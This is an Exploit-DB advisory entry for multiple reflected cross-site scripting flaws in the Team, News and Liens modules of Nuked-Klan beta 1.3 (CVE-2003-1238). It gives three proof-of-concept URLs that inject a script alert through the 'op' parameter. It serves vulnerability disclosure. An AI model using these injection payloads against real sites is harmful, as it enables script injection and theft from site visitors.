Nuked-Klan 1.3 - Multiple Cross-Site Scripting Vulnerabilities

2003-02-23T00:00:00
ID EDB-ID:22276
Type exploitdb
Reporter gregory Le Bras
Modified 2003-02-23T00:00:00

Description

Nuked-Klan 1.3 Multiple Cross Site Scripting Vulnerabilities. CVE-2003-1238. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/6916/info

It has been reported that Nuked-Klan beta 1.3 is prone to cross site scripting attacks. The problem occurs in the 'Team', 'News', and 'Liens' modules which fails to sufficiently sanitize user-supplied HTML and script code located in URI parameters.

This vulnerability was reported for Nuked-Klan beta 1.3; earlier versions may also be affected. 

http://www.example.org/index.php?file=Team&op=<script>alert('Test');</script>

http://www.example.org/index.php?file=News&op=<script>alert('test');</script>

http://www.example.org/index.php?file=Liens&op=<script>alert('test');</script>